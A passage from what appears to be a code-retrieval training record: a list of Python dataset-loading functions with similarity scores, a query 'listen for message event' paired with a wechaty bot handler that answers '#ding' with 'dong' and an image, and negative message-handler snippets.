X_test.reshape(X_test.shape[0],1,X_test.shape[1],X_test.shape[2])\n\n\n y_train = X_train\n y_valid = X_valid\n y_test = X_test\n\n r={}\n for x,y in zip(X_test,y_test_labels):\n # print(\"x: {}\".format(x))\n # print(\"y: {}\".format(y))\n _y = list(y)\n if int(_y.index(1.0)) not in r:\n r[int(_y.index(1.0))]=[x]\n else:\n r[int(_y.index(1.0))].append(x)\n\n for key in r:\n r[key] = np.asarray(r[key])\n\n\n return dict(\n X_train=X_train,\n y_train=y_train,\n X_valid=X_valid,\n y_valid=y_valid,\n X_test=X_test,\n y_test=y_test,\n labeled_test=r,\n caswells_dim = y_train_labels.shape[-1],\n num_examples_train=X_train.shape[0],\n num_examples_valid=X_valid.shape[0],\n num_examples_test=X_test.shape[0],\n input_shape=X_train.shape,\n output_dim=y_train.shape[-1],\n )", "def load_data_and_labels(self):\n gen = image.ImageDataGenerator()\n target_size = (224,224)\n 
if self.preprocess:\n print('Preprocessing data...')\n if not os.path.isdir(self.pproc_dir()):\n os.mkdir(self.pproc_dir())\n \n batch_arr = []\n for ld,segment in [(self.train_dir(), 'train'),\n (self.valid_dir(), 'valid')]:\n # TODO(ness): segment = os.basename(ld)\n flowgen = gen.flow_from_directory(\n ld,\n target_size=target_size,\n shuffle=False,\n class_mode=None,\n batch_size=1)\n # Save the batches using method defined in utils.py\n data = np.concatenate([flowgen.next() for i in range(flowgen.n)])\n batches_dir = self.pproc_dir() + segment + '-bc'\n save_array(batches_dir, data)\n \n # Save the classes.\n cls_dir = self.pproc_dir() + segment + '-cl'\n save_array(cls_dir, flowgen.classes)\n \n batch_arr.append((data, flowgen.classes, flowgen.class_indices))\n \n # Set the data.\n self.training_data = batch_arr[0][0]\n self.validation_data = batch_arr[1][0]\n \n # Classes are zero-indexed and represent a category in\n # numerical form. So if the classes are 'dog' and 'cat',\n # the possible class values will be 0 and 1.\n self.trn_classes = batch_arr[0][1]\n self.val_classes = batch_arr[1][1]\n \n # Labels are the one-hot encoded (i.e. categorical)\n # version of the classes. In other words, if there are\n # 5 classes and an element belongs to class 2,\n # its label will be [0,0,1,0,0] (index 1).\n self.training_labels = to_categorical(batch_arr[0][1])\n self.validation_labels = to_categorical(batch_arr[1][1])\n \n # Class indices are dictionaries of the form\n # {'category_name': 0, 'category_name_2: 1}. They\n # make the mapping between numerical class indices and\n # a human-readable category name. They are (should be...)\n # the same for validation and training, so only load them\n # once, after sanity checking.\n self.cindices = batch_arr[0][2]\n print('Done preprocessing.')\n else:\n print('Loading data...')\n # Load the pre-saved data using methods defined in utils.py. See\n # preprocessing branch for the meaning of the data.\n self.training_data = load_array(self.pproc_dir() + 'train-bc')\n self.validation_data = load_array(self.pproc_dir() + 'valid-bc')\n self.trn_classes = load_array(self.pproc_dir() + 'train-cl')\n self.val_classes = load_array(self.pproc_dir() + 'valid-cl')\n self.training_labels = to_categorical(self.trn_classes)\n self.validation_labels = to_categorical(self.val_classes)\n \n # To get the class indices, we create the generator. 
It's cheap to\n # run since it doesn't actually load all the data.\n flowgen = gen.flow_from_directory(\n self.train_dir(),\n target_size=target_size,\n shuffle=False,\n class_mode=None,\n batch_size=1) \n self.cindices = flowgen.class_indices\n print('Done loading.')", "def load_data():\n X = load_pickle(config['image_paths']['train_images_pickle'])\n y = load_train_labels()\n y = to_categorical(y)\n test_indices = np.random.choice(len(X), int(len(X) * float(config['model']['test_size'])), replace=False)\n X_train = np.asarray([e for idx, e in enumerate(X) if idx not in test_indices])\n X_test = np.asarray([e for idx, e in enumerate(X) if idx in test_indices])\n y_train = np.asarray([e for idx, e in enumerate(y) if idx not in test_indices])\n y_test = np.asarray([e for idx, e in enumerate(y) if idx in test_indices])\n return X_train, y_train, X_test, y_test", "def Train_data():\n print (\"loading train data ...\")\n time_start = time.time()\n data_root = '/media/keziwen/86AA9651AA963E1D'\n with h5py.File(join(data_root, './data/train_real2.h5')) as f:\n data_real = f['train_real'][:]\n num, nt, ny, nx = data_real.shape\n data_real = np.transpose(data_real, (0, 1, 3, 2))\n with h5py.File(join(data_root, './data/train_imag2.h5')) as f:\n data_imag = f['train_imag'][:]\n num, nt, ny, nx = data_imag.shape\n data_imag = np.transpose(data_imag, (0, 1, 3, 2))\n data = data_real+1j*data_imag\n num_train = 15000\n num_validate = 2000\n train_data = data[0:num_train]\n validate_data = data[num_train:num_train+num_validate]\n\n train_data = np.random.permutation(train_data)\n\n time_end = time.time()\n print ('dataset has been created using {}s'.format(time_end-time_start))\n return train_data, validate_data", "def load_data():\n # Load image data from MNIST.\n (train_x, train_y),(eval_x, eval_y) = keras.datasets.mnist.load_data()\n\n # We convert the input data to (60000, 28, 28, 1), float32 and normalize our data values to the range [0, 1].\n train_x = train_x.reshape(train_x.shape[0], train_x.shape[1], train_x.shape[2], 1)\n eval_x = eval_x.reshape(eval_x.shape[0], eval_x.shape[1], eval_x.shape[2], 1)\n\n train_x = train_x.astype('float32')\n eval_x = eval_x.astype('float32')\n train_x /= 255\n eval_x /= 255\n\n # Preprocess class labels \n train_y = train_y.astype(np.int32)\n eval_y = eval_y.astype(np.int32)\n\n train_y = np_utils.to_categorical(train_y, 10)\n eval_y = np_utils.to_categorical(eval_y, 10)\n\n return train_x, train_y, eval_x, eval_y", "def _load_raw_datashards(shard_num, nb_collaborators): \n train_obj = torchvision.datasets.CIFAR10('~/.CIFAR10', train=True, download=True) \n test_obj = torchvision.datasets.CIFAR10('~/.CIFAR10', train=False, download=True) \n x_train = train_obj.data\n y_train = np.asarray(train_obj.targets)\n x_test = test_obj.data\n y_test = np.asarray(test_obj.targets)\n # fix the label dimension to be (N,)\n y_train = y_train.reshape(-1)\n y_test = y_test.reshape(-1) \n \n # create the shards\n X_train_shards = x_train[shard_num::nb_collaborators]\n y_train_shards = y_train[shard_num::nb_collaborators]\n \n X_test_shards = x_test[shard_num::nb_collaborators]\n y_test_shards = y_test[shard_num::nb_collaborators]\n return (X_train_shards, y_train_shards), (X_test_shards, y_test_shards)", "def load_cifar10(directory, normalize=True):\n training_data = []\n training_labels = []\n for i in range(1, 6):\n try:\n d = unpickle(directory + f\"/data_batch_{i}\")\n except FileNotFoundError:\n raise Exception(f\"File 'data_batch_{i}' is not found in the specified 
directory '{directory}'.\")\n training_data.append(d[b\"data\"])\n training_labels.append(d[b\"labels\"])\n training_data = np.vstack(training_data)\n training_data = np.reshape(training_data, newshape=(-1, 3, 32, 32))\n training_labels = np.concatenate(training_labels)\n training_labels = np.array(list(map(lambda hot: one_hot(10, hot), training_labels)))\n\n try:\n test = unpickle(directory + \"/test_batch\")\n except FileNotFoundError:\n raise Exception(f\"File 'test_batch' is not found in the specified directory '{directory}'.\")\n test_data = np.reshape(test[b\"data\"], newshape=(-1, 3, 32, 32))\n test_labels = np.array(list(map(lambda hot: one_hot(10, hot), test[b\"labels\"])))\n\n try:\n meta = unpickle(directory + \"/batches.meta\")\n except FileNotFoundError:\n raise Exception(f\"File 'batches.meta' is not found in the specified directory '{directory}'.\")\n label_names = meta[b\"label_names\"]\n label_names = list(map(lambda x: x.decode(\"utf-8\"), label_names))\n\n if normalize:\n training_data = training_data / 255\n test_data = test_data / 255\n\n return training_data, training_labels, test_data, test_labels, label_names", "def init_train(self):\n data = self.loader.load_labelled_data(self.conf.split, 'training')\n\n # Initialise unlabelled data iterator\n num_ul = 0\n if self.conf.ul_mix > 0:\n ul_data = self.loader.load_unlabelled_data(self.conf.split, 'all')\n\n # calculate number of unlabelled images as a proportion of the labelled images\n num_ul = int(data.size() * self.conf.ul_mix)\n num_ul = num_ul if num_ul <= ul_data.size() else ul_data.size()\n log.info('Sampling %d unlabelled images out of total %d.' % (num_ul, ul_data.size()))\n ul_data.sample(num_ul)\n self.gen_X_U = data_utils.generator(self.conf.batch_size, 'overflow', ul_data.images)\n\n # Initialise labelled data iterator\n assert self.conf.l_mix >= 0\n\n # calculate number of labelled images\n num_l = int(data.size() * self.conf.l_mix)\n num_l = num_l if num_l <= data.size() else data.size()\n log.info('Using %d labelled images out of total %d.' 
% (num_l, data.size()))\n train_images = data.images[:num_l]\n train_masks = data.masks[:num_l]\n\n self.conf.unlabelled_image_num = num_ul\n self.conf.labelled_image_num = num_l\n self.conf.data_len = num_ul if num_ul > num_l else num_l\n self.conf.batches = int(np.ceil(self.conf.data_len / self.conf.batch_size))\n self.conf.save()\n\n self.gen_X_L = data_utils.generator(self.conf.batch_size, 'overflow', train_images, train_masks)\n\n # Initialise real masks iterator for discriminator training, using the real masks from the data CV split.\n self.other_masks = data_utils.generator(self.conf.batch_size, 'overflow', data.masks + 0)", "def load_data(path='alex_mnist_data.npz'):\n with np.load(path, allow_pickle=True) as f:\n x_train, y_train = f['alex_train_data'], f['alex_train_label']\n x_test, y_test = f['alex_test_data'], f['alex_test_label']\n return (x_train, y_train),(x_test, y_test)", "def learnDataset(self, data_loader):\n\n print(\"learning dataset\")\n # we have 127940 sentences in total\n count = 0\n for sample in data_loader:\n input_sentence = sample[\"input\"][0]\n target_sentence = sample[\"target\"][0]\n\n # NOTE: target_word & input_word are actually indecies of words, instead of word strings\n # NOTE: the first word has index 1\n first_target = int(target_sentence[1])\n first_input = int(input_sentence[1])\n\n self.emiss_factors[0][(first_input, first_target)] += 1\n\n prev_target = first_target\n for word_idx in range(2, 16):\n # note that word_idx is 0 is always <BOS>\n target_word = int(target_sentence[word_idx])\n input_word = int(input_sentence[word_idx])\n\n self.emiss_factors[word_idx - 1][(input_word, target_word)] += 1\n self.trans_factors[word_idx - 2][(prev_target, target_word)] += 1\n prev_target = target_word\n\n print(\"{}/127940\".format(count), end = \"\\r\")\n count += 1\n print(\"127940/127940\")\n\n # all data updated, no need to do any insertion\n for i in range(15):\n self.emiss_factors[i].fixed()\n for i in range(14):\n self.trans_factors[i].fixed()", "def load_data(filename):\n assert os.path.exists(filename)==True\n dat = scipy.io.loadmat(filename)\n inputs = dat['inputs']\n #print len(inputs)\n targets = dat['targets']\n #print len(targets)\n assert len(inputs)==len(targets)\n\n global alldata\n global indim \n global outdim\n\n indim = len(inputs[0])\n outdim = 1\n #print indim\n alldata = ClassificationDataSet(indim, outdim, nb_classes = 8)\n alldata.setField('input',inputs)\n alldata.setField('target',targets)\n\n assert len(alldata['input'])==len(alldata['target'])\n print type(alldata)", "def create_data(data_size,heme, nucleotide, control, steroid,data_total,path_to_data):\n\n os.chdir(path_to_data)\n\n x_array = np.zeros(shape = (data_size,14,32,32,32))\n\n y_array = np.zeros(shape = data_size)\n\n print(\"data size = \", data_size)\n\n #training set :\n\n file_count = 0\n\n for file in data_total:\n\n y_array[file_count]= find_class(str(file), heme, nucleotide, control, steroid)\n\n x_array[file_count] = np.load(str(file+\".npy\"))\n\n file_count+=1\n\n\n return (x_array, y_array)", "def load_aal_atlas(atlas_dir, aal_basename=\"ROI_MNI_V4\", verbose=0):\n \n if not osp.isdir(atlas_dir):\n raise ValueError(\"%s not a directory\" % atlas_dir)\n\n aal_img_name = glob.glob(osp.join(atlas_dir, aal_basename+\"*.nii\"))[0]\n aal_labels_name = glob.glob(osp.join(atlas_dir, aal_basename+\"*.txt\"))[0]\n aalimg = nib.load(aal_img_name)\n data = aalimg.get_data()\n\n labels = []\n with open(aal_labels_name) as f:\n for line in f.read().splitlines():\n 
labels.append(line.split(\"\\t\"))\n \n # labels is now a list of [\"short name\", \"long name\", \"ROI_value\"]\n # [['FAG', 'Precentral_L', '2001'], ['FAD', 'Precentral_R', '2002'], ...]\n n_roi = len(labels)\n split_data = np.ndarray(aalimg.shape + (n_roi,), dtype=bool)\n split_data.fill(False)\n \n only_name_labels = []\n roi_size = []\n for idx,lab in enumerate(labels):\n only_name_labels.append(lab[1])\n split_data[...,idx] = data==int(lab[2])\n roi_size.append(split_data[...,idx].sum())\n \n return (split_data, aalimg.get_affine(), only_name_labels, roi_size)", "def load_pascal(data_dir, split='train'):\n # Wrote this function\n # idx = 0\n # if idx >20:\n # idx+=1\n # break\n \"\"\"\n print(\"Begin Load Images ------------------------------------\")\n images = []\n # images_dict -> key: img_file_idx, value: rgb image ndarray (256*256*3)\n images_dict = {}\n # count\n for infile in glob.glob(\"./VOCdevkit/VOC2007/JPEGImages/*.jpg\"):\n # reshape the images to 256*256*3\n file, ext = os.path.splitext(infile)\n file_idx = file[-6:]\n\n try:\n im = Image.open(infile)\n resized_img = im.resize((256, 256), Image.ANTIALIAS)\n resized_arr = np.array(resized_img)\n images_dict[file_idx] = resized_arr.astype(np.float32)\n except IOError:\n print(\"Error\")\n\n save_obj(images_dict,\"images_dict\")\n \"\"\"\n # label_mat: 2d array, each annotation file is one label_col, multiple label_col mean multiple annotation files\n label_mat = []\n weight_mat = []\n image_mat = []\n\n images_dict = load_obj(\"images_dict\")\n print(\"Return Load Images ------------------------------------\")\n\n # for filename in os.listdir(\"./VOCdevkit/VOC2007/ImageSets/Main/\"):\n for filename in enumerate(CLASS_NAMES):\n\n with open(\"./VOCdevkit/VOC2007/ImageSets/Main/\"+filename[1] +\"_\"+split+\".txt\") as fp:\n print(fp)\n image_mat = []\n label_col = []\n weight_col = []\n line = fp.readline()\n cnt = 1\n while line:\n\n label_idx = line.strip()[:-3]\n try:\n # print(\"Line {}: {}\".format(label_idx, type(label_idx)))\n # Be aware!! 
'000005 ' is different from '000005', there is a space in the first string!!!\n # label_idx = '000005 ' label_idx[:-1]='000005'\n image_mat.append(images_dict[label_idx])\n except IOError:\n print(\"Error Line {}: {}\".format(label_idx, type(label_idx)))\n\n label_flag = int(line.strip()[-2:])\n\n if label_flag is 0 or label_flag is -1:\n label_col.append(np.int32(0))\n else:\n label_col.append(np.int32(1))\n\n if label_flag is 1 or label_flag is -1:\n weight_col.append(np.int32(1))\n else:\n weight_col.append(np.int32(0))\n\n line = fp.readline()\n cnt += 1\n np_label_col = np.asarray(label_col)\n label_mat.append(np_label_col)\n # print(np.shape(label_mat))\n np_weight_col = np.asarray(weight_col)\n weight_mat.append(np_weight_col)\n\n # print('image_mat {}: label_mat {}'.format(np.shape(image_mat), np.shape(label_mat)))\n np_image_mat = np.asarray(image_mat)\n np_label_mat = np.asarray(label_mat)\n np_weight_mat = np.asarray(weight_mat)\n # print('np_image_mat {}: np_label_mat {}'.format(np.shape(np_image_mat), np.shape(np_label_mat)))\n np_trans_label_mat = np_label_mat.transpose()\n np_trans_weight_mat = np_weight_mat.transpose()\n # print(np.shape(np_label_mat))\n # print(np.shape(np_weight_mat))\n print('np_trans_label_mat {}: np_trans_weight_mat {}'.format(np.shape(np_trans_label_mat), np.shape(np_trans_weight_mat)))\n print(\"Return Load Weights and Labels ------------------------------------\")\n return np_image_mat, np_trans_label_mat, np_trans_weight_mat", "def load_preprocess_training_batch(batch_id, batch_size):\r\n filename = 'preprocess_batch_' + str(batch_id) + '.p'\r\n features, labels = pickle.load(open(filename, mode='rb'))\r\n# labels = np.argmax(labels,1)\r\n# num = len(labels)\r\n# arr = np.zeros((num, 1))\r\n# for i in range(num):\r\n# arr[i][0] = labels[i]\r\n# np.reshape(features,(2500,150528))\r\n# ind = [i for i in range(len(features))]\r\n# random.shuffle(ind)\r\n# features = features[ind]\r\n# labels = labels[ind]\r\n\r\n # Return the training data in batches of size <batch_size> or less\r\n return features[0:batch_size],labels[0:batch_size]", "def test_cached_dataloader(self):\n\n v = [\"data\", \"target\", \"model_out_sqnet\"]\n\n for data, target in self.train_loader:\n b, c, h, w = data[v[0]].shape\n assert data[v[1]].shape == (b, )\n assert data[v[2]].shape == (b, 100)\n assert data[v[1]].shape == target.shape", "def __init__(self, directory, dataset, B_SIZE = 32):\n \n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n \n self.directory = directory\n self.dataset = dataset\n self.batch_size = B_SIZE\n self.hidden_dim = 64\n self.embedding_dim = 300\n \n all_data = pickle.load(open(directory + dataset + \"/data.p\", \"rb\"))\n \n self.w2ix = all_data.w2ix\n self.vocab_size = len(self.w2ix) \n \n self.mask_list = []\n self.mask_tokens = [\"<PAD>\", \"<SOS>\", \"<EOS>\", \".\"]\n \n for item in self.mask_tokens:\n \n if item in self.w2ix:\n \n self.mask_list.append(self.w2ix[item])\n \n self.pretrained_embeds = all_data.pretrained_embeds\n \n \n # In[4]:\n \n \n x_train, y_train = zip(*all_data.train)\n x_dev, y_dev = zip(*all_data.dev)\n x_test, y_test = zip(*all_data.test)\n \n print(\"\\nVocab size:\", len(self.w2ix),\n \"\\nTraining size:\", len(y_train),\n \"\\nDev size:\", len(y_dev),\n \"\\nTest size:\", len(y_test))\n \n # In[5]:\n \n self.output_size= len(np.unique(y_train))\n \n print(\"\\nOutput dimension: \", self.output_size, \"\\n\")\n \n \n self.sequence_length = all_data.sequence_length()\n \n if dataset 
== \"mimicanemia\":\n \n \tself.sequence_length = 2200\n \n print(\"--Sequence length :\", self.sequence_length, \"\\n\")\n \n # In[10]:\n \n from modules.utils import padder\n \n x_train_pad, train_lengths = padder(x_train, pad_len = self.sequence_length)\n x_dev_pad, dev_lengths = padder(x_dev, pad_len = self.sequence_length)\n x_test_pad, test_lengths = padder(x_test, pad_len = self.sequence_length)\n \n \n # In[11]:\n \n x_train_pad = torch.LongTensor(x_train_pad)#.to(device)\n x_dev_pad = torch.LongTensor(x_dev_pad)#.to(device)\n x_test_pad = torch.LongTensor(x_test_pad)#.to(device)\n train_lengths = torch.LongTensor(train_lengths)#.to(device)\n dev_lengths = torch.LongTensor(dev_lengths)#.to(device)\n test_lengths = torch.LongTensor(test_lengths)#.to(device)\n y_train = torch.LongTensor(y_train)#.to(device)\n y_dev = torch.LongTensor(y_dev)#.to(device)\n y_test = torch.LongTensor(y_test)#.to(device)\n \n \n # In[12]:\n \n \n training_prebatch = list(zip(x_train_pad, train_lengths, y_train))\n dev_prebatch = list(zip(x_dev_pad, dev_lengths, y_dev))\n testing_prebatch = list(zip(x_test_pad, test_lengths, y_test))\n \n \n training_prebatch = sorted(training_prebatch, key = lambda x : x[1], reverse = False)\n dev_prebatch = sorted(dev_prebatch, key = lambda x : x[1], reverse = False)\n testing_prebatch = sorted(testing_prebatch, key = lambda x : x[1], reverse = False)\n \n # In[13]:\n \n ### removing sos and eos only sentences\n \n train_prebatch = [x for x in training_prebatch if x[1] > 2]\n dev_prebatch = [x for x in dev_prebatch if x[1] > 2]\n test_prebatch = [x for x in testing_prebatch if x[1] > 2]\n \n \n self.training = DataLoader(train_prebatch, batch_size = self.batch_size, \n shuffle = True, pin_memory = False)\n \n self.development = DataLoader(dev_prebatch, batch_size = self.batch_size, \n shuffle = False, pin_memory = False)\n \n \n self.testing = DataLoader(test_prebatch, batch_size = self.batch_size, \n shuffle = False, pin_memory = False)", "def data_prepare(raw_datapath, save_path, sample_size=256):\n ## data path\n data_path = raw_datapath\n ## sample size\n data_size = sample_size\n\n ## data lists\n pts = ['100', '104', '108', '113', '117', '122', '201', '207', '212', '217', '222', '231',\n '101', '105', '109', '114', '118', '123', '202', '208', '213', '219', '223', '232',\n '102', '106', '111', '115', '119', '124', '203', '209', '214', '220', '228', '233',\n '103', '107', '112', '116', '121', '200', '205', '210', '215', '221', '230', '234']\n\n ## map the ~19 classes to 5 classes\n ## according to the paper https://arxiv.org/pdf/1805.00794.pdf\n mapping = {'N': 0, 'L': 0, 'R': 0, 'e': 0, 'j': 0, 'B': 0, # N = 0\n 'A': 1, 'a': 1, 'J': 1, 'S': 1, # S = 1\n 'V': 2, 'E': 2, 'r': 2, 'n': 2, # V = 2\n 'F': 3, # F = 3\n '/': 4, 'f': 4, 'Q': 4, '?': 4} # Q = 4\n ignore = ['+', '!', '[', ']', 'x', '~', '|', '\"']\n\n ## we split the each set of the data into size 256( which we can see the ecg pulse, just one pulse)\n def dataSaver(dataset=pts, data_size=data_size):\n input_size = data_size ## default\n\n def dataprocess():\n ecg = np.zeros((1, input_size))\n label = np.zeros((1, 1))\n for num in tqdm(dataset):\n print(num, 'now')\n idx = 0 ## count for the matrixes\n record = wfdb.rdrecord(data_path + num, smooth_frames=True)\n\n ## normalize the data ecg\n signals0 = np.nan_to_num(record.p_signal[:, 0])\n # signals1 = np.nan_to_num(record.p_signal[:, 1])\n min_max_scaler = preprocessing.MinMaxScaler()\n signals0 = min_max_scaler.fit_transform(signals0.reshape(-1, 1))\n # 
signals1 = min_max_scaler.fit_transform(signals1.reshape(-1, 1))\n signals0 = signals0.reshape(-1)\n # signals1 = signals1.reshape(-1)\n\n ## find peaks # R-peaks\n ## we only use the channel 0\n peaks, _ = find_peaks(signals0, distance=150)\n\n X = np.zeros((len(peaks), input_size))\n Y = np.zeros((len(peaks), 1))\n\n # skip a first peak to have enough range of the sample\n # in the for loop, we look for the annotation\n for peak in tqdm(peaks[1:-1]):\n start, end = peak - input_size // 2, peak + input_size // 2\n start = max([0, start])\n end = min([len(signals0), end])\n ann = wfdb.rdann(data_path + num, extension='atr', sampfrom=start, sampto=end,\n return_label_elements=['symbol'])\n symbol = ann.symbol\n count = 0\n if len(symbol) != 1:\n for sym in symbol:\n if sym in ignore:\n count += 1\n continue\n elif sym == 'N':\n continue\n else:\n symbol = sym\n break\n if count > 0 and len(symbol) > 1:\n symbol = '+'\n elif len(symbol) > 1:\n symbol = 'N'\n elif len(symbol) == 0:\n symbol = '+'\n assert len(symbol) <= 1, \"the symbol is not only one.{} len\".format(len(symbol))\n\n if len(symbol) == 1:\n for ss in symbol:\n if ss in ignore:\n continue\n else:\n Y[idx, 0] = mapping[ss]\n sig = signals0[start:end]\n X[idx, :len(sig)] = sig\n idx += 1\n ecg = np.concatenate((ecg, X), axis=0)\n label = np.concatenate((label, Y), axis=0)\n ecg = ecg[1:, :]\n label = label[1:, :]\n ecg = pd.DataFrame(ecg)\n label = pd.DataFrame(label)\n\n return ecg, label\n ecg, label = dataprocess()\n return ecg, label\n\n ecg, label = dataSaver(pts)\n ecg_path = save_path + \"/ecg_signal_{}.csv\".format(data_size)\n label_path = save_path + \"/label_{}.csv\".format(data_size)\n ecg.to_csv(ecg_path, index=None, header=None)\n label.to_csv(label_path, index=None, header=None)\n return ecg, label", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def get_loader(m,image_dir, attr_path, selected_attrs, crop_size=178, image_size=128, \n batch_size=16, dataset='CelebA', mode='train', num_workers=1):\n transform = []\n transform.append(T.ToTensor())\n #transform.append(T.Normalize(mean=[0.5], std=[0.5]))\n transform = T.Compose(transform)\n\n if dataset == 'CelebA':\n dataset = CelebA(image_dir, attr_path, selected_attrs, transform, mode)\n elif dataset == 'RaFD':\n if m==10:\n dataset = ImageFolder1(image_dir, transform,mode)\n else:\n dataset = ImageFolder(image_dir, transform,mode)\n \n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=(mode=='train'),\n num_workers=num_workers)\n return data_loader", "def _load_dataset(self, path):\n\t\twhile True:\n\t\t\t\n\t\t\ttry:\n\t\t\t\tX_train = np.load(\"data/X_train.npy\")\n\t\t\t\tX_val = np.load(\"data/X_val.npy\")\n\t\t\t\tY_train = np.load(\"data/Y_train.npy\")\n\t\t\t\tY_val = np.load(\"data/Y_val.npy\")\n\t\t\t\tbreak\n\n\t\t\texcept FileNotFoundError:\n\n\t\t\t\tdata_temp = np.zeros((50000,64,64,3))\n\t\t\t\tlabel_temp = []\n\n\t\t\t\tfor i in range(5):\n\n\t\t\t\t\tfile = path + str(i+1)\n\t\t\t\t\twith open(file, 'rb') as fo:\n\t\t\t\t\t\ttemp_element = pickle.load(fo, encoding='bytes')\n\n\t\t\t\t\ttemp_data = temp_element[b'data']\n\t\t\t\t\tlabel_temp.extend(temp_element[b'labels'])\n\n\t\t\t\t\tfor j in range(10000):\n\t\t\t\t\t\tdata_temp[j+(i*10000)] = self._reshape(temp_data[j])\n\n\t\t\t\tlabel_temp = np.eye(10)[np.array(label_temp)]\n\n\t\t\t\tnp.random.seed(123)\n\t\t\t\tpermutations = 
list(np.random.permutation(50000))\n\t\t\t\tX = data_temp[permutations, :, : , :] \n\t\t\t\tY = label_temp[permutations, :]\n\t\t\t\tX_train = X[0:40000, :, :, :] \n\t\t\t\tY_train = Y[0:40000, :]\n\t\t\t\tX_val = X[40000:50000, :, :, :] \n\t\t\t\tY_val = Y[40000:50000, :]\n\n\t\t\t\tnp.save(\"./data/X_train\", X_train)\n\t\t\t\tnp.save(\"./data/X_val\", X_val)\n\t\t\t\tnp.save(\"./data/Y_train\", Y_train)\n\t\t\t\tnp.save(\"./data/Y_val\", Y_val)\n\t\t\t\tbreak\n\n\t\treturn X_train, X_val, Y_train, Y_val" ]
[ "0.7416813", "0.6421557", "0.6321571", "0.60597914", "0.5983696", "0.5967315", "0.5948484", "0.59380203", "0.5907359", "0.5897862", "0.58657163", "0.58646065", "0.5861289", "0.58553", "0.58469105", "0.577485", "0.5769538", "0.5751676", "0.574995", "0.57490104", "0.5744094", "0.57396305", "0.5732606", "0.57227415", "0.56898874", "0.568698", "0.56710476", "0.5668816", "0.56482786", "0.5638793", "0.563711", "0.5632243", "0.5625967", "0.562593", "0.5618013", "0.56117654", "0.5609205", "0.5608604", "0.5599277", "0.5594843", "0.559322", "0.5589608", "0.5575619", "0.5571026", "0.55673754", "0.55615956", "0.555366", "0.55532426", "0.555229", "0.55474657", "0.5536288", "0.5536013", "0.55331415", "0.55299747", "0.5527531", "0.5526474", "0.5526104", "0.5524737", "0.55190784", "0.5516717", "0.5514169", "0.5513925", "0.55071664", "0.55064833", "0.54975945", "0.54910827", "0.54844326", "0.54843134", "0.5471428", "0.5467664", "0.5460486", "0.54601604", "0.5457895", "0.54537004", "0.5451066", "0.54459757", "0.5445256", "0.54447234", "0.54437953", "0.5443104", "0.54369015", "0.54340065", "0.54311836", "0.5429621", "0.5427722", "0.54249346", "0.54218954", "0.5421273", "0.54162335", "0.54152423", "0.5414264", "0.5410717", "0.5410546", "0.5407391", "0.54058534", "0.54042894", "0.54013336", "0.5400514", "0.5397369", "0.5394984" ]
0.72671366
1
listen for message event
async def on_message(self, msg: Message): from_contact = msg.talker() text = msg.text() room = msg.room() if text == '#ding': conversation: Union[ Room, Contact] = from_contact if room is None else room await conversation.ready() await conversation.say('dong') file_box = FileBox.from_url( 'https://ss3.bdstatic.com/70cFv8Sh_Q1YnxGkpoWK1HF6hhy/it/' 'u=1116676390,2305043183&fm=26&gp=0.jpg', name='ding-dong.jpg') await conversation.say(file_box)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _handle_message(self, msg):\n self.event('message', msg)", "def on_message(data):\n pass", "def event_in_cb(self, msg):\n self.event = msg.data", "def on_message(self, message):\n print \"Client %s received a message : %s\" % (self.id, message)", "def onMessage(self, message):\n raise NotImplementedError", "def msg_event(self, event):\r\n pass", "def receive_message(self, message):", "def on_message(self, message):\n log.debug(\"Protocol got message {message}\", message=message)\n if message['type'] == \"change\":\n self.handler.process_packet(message['packet'])\n self.send_packet()\n elif message['type'] == \"chat\":\n self.on_chat_message(message)\n elif message['type'] == \"action\":\n self.on_action(message)\n else:\n log.warn(\"Unrecognized message type {type}\", type=message['type'])", "def on_message(self, message):\n print \"Client %s received a message : %s\" % (self.id, message)\n self.write_message(\"Conn!\")", "def on_message(self,ws,message):\n pass", "def listen(client, main):\n\n @client.event\n async def on_message_edit(old, message):\n main.message_handler(message, True)", "def on_message(self, event):\n self.response = event.message\n self.connection.container.yield_() # Wake up the wait() loop to handle the message.", "def receive_message(self, message):\r\n return", "def handleMessage(msg):", "def message_callback(self, message):\n pass", "def handle_message(self, message):", "def receive(self, message):", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def handle_msg(msg):\n if comm._msg_callback:\n comm._msg_callback(msg)", "def callback_message(self, message):\n pass", "def callback_message(self, message):\n pass", "def on_message(self, message):\n #print(f\"This message was sent: {message}\") # Writes to the console window (server side)\n self.write_message(f\"This message was sent: {message}\") # Writes message to sender", "def handle_message(self, msg):\n pass", "def _on_message(self, message):\n print(\"RECEIVED on \" + self.session_name + \":\")\n message_json = json.loads(message)\n print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))\n\n for singleMsg in message_json:\n self._process_message(singleMsg)", "def handle(self, message):\n print(\"You received a message:\")\n print(message)\n # Overwrite this function to do something with the message!", "async def on_message(self, message: \"steam.Message\") -> None:", "def _on_message(self, raw_msg):\n strmsg = raw_msg.decode()\n msg = json.loads(strmsg)\n\n print(msg)\n\n if self._handlers.get(msg['msgid']):\n for handler in self._handlers[msg['msgid']]:\n handler.handle(msg)", "def received_message(self, m):\n self.receiver.handle_message(m)", "def handle(self, message):", "def on_msg(self, callback):\n self._msg_callback = callback", "def listen_for_any_message(self, msg, match):\n question=\"{}\".format(msg)\n return self.cbmodel.get_response(question)", "def on_receive(self, msg):\n raise NotImplementedError", "def receive(self, msg):\n pass", "def event_receive(self,event):\n\n pass", "def on_message(self, message):\n self.write_message(u\"%s\" % message)", "def listen():\n msg = MSG()\n ctypes.windll.user32.GetMessageA(ctypes.byref(msg), 0, 0, 0)", "def listen():\n msg = MSG()\n ctypes.windll.user32.GetMessageA(ctypes.byref(msg), 0, 0, 0)", "def on_message(client1, userdata, message):\n print(\"message received \" ,str(message.payload.decode(\"utf-8\")))", "def 
